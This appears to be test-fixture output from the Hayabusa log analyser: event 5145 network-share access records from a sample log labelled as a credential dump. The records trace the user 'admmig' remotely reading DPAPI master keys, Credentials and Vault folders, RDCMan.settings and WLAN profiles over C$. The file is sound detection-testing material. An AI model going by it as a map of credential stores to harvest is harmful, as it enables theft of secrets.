+2021-12-12 20:53:11.794 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.826 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.841 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.889 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.905 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.956 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:14.718 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.562 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
